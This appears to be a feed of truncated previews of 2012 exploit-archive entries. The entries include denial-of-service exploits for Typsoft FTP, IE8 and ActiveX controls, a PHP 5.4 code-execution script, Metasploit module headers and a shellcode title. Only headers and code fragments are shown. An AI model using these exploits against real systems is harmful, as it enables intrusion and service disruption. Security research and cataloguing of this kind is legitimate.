#!/usr/bin/perl # Exploit Title: Typsoft FTP Server DoS CWD command # Date: 02/06/2012 # Author: Balazs Makany # Software Link: http://sourceforge.net/projects/ftpserv/ # Version: 1.10 # Tested on: Windows 7 # (does not work on Windows XP) # # Please
!-- [+] Microsoft Internet Explorer 8 stack exhaust --!-- --!-- Vuln type: Denial of Service --!-- Author: Todor Donev --!-- Author mail: todor.donev@@gmail.com --!-- --!-- This is simple crash exploit for MS IE8, tested on Windows XP SP3 EN -- !--
Title : PDF Viewer Component ActiveX DoS Auther : Senator of Pirates E-Mail : Senator.of.Pirates.team@gmail.com FaceBook : FaceBook.Com/SenatorofPirates Software link : http://www.ocxt.com/download/PDFViewerSetup.exe Date : 05/02/2012 Tested : Window
Author : Senator of Pirates This exploit tested on Windows Xp SP3 EN http://www.edrawsoft.com/download/EDBoardSetup.exe -------------------------------------------------------------------------------------------------------- object classid='clsid:61
?php /* This script generates a POST header that makes PHP 5.4.0RC6 *64 bit* try to execute code at 0x1111111111111111 (C) Copyright 2012 Stefan Esser PHP 5.3.9 requires you to know the address of a writable address filled with NULL. 32bit requires y
From: cataphract Operating system: Any PHP version: 5.4SVN-2012-02-03 (SVN) Package: Reproducible crash Bug Type: Bug Bug description:Buffer overflow on htmlspecialchars/entities with $double=false Description: ------------ Long entities can cause a
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/f
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/f
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewor
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo
# Title :windows xp sp2 [ arabic] mechanism shellcode 128 bytes+proxy=500bytes# Author :TrOoN# E-mail : SOUrRce-x@live.fr | www.facebook.com/fysl.fyslm# Home : city 617 logts : Draria . algeria# Web Site : www.1337day.com | 1337Day is ThE best pente
# Title :frontpage_express2.02 Denial of Service winsock# Author :TrOoN# E-mail : SOUrRce-x@live.fr | www.facebook.com/fysl.fyslm# Home : city 617 logts : Draria . algeria# Web Site : www.1337day.com |# platform : WinDows XP sp 2# Type : local explo
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 // Most browsers limit cookies to 4k characters, so we need multiple function setCookies (good) { // Construct string for cookie value var str = ; for (v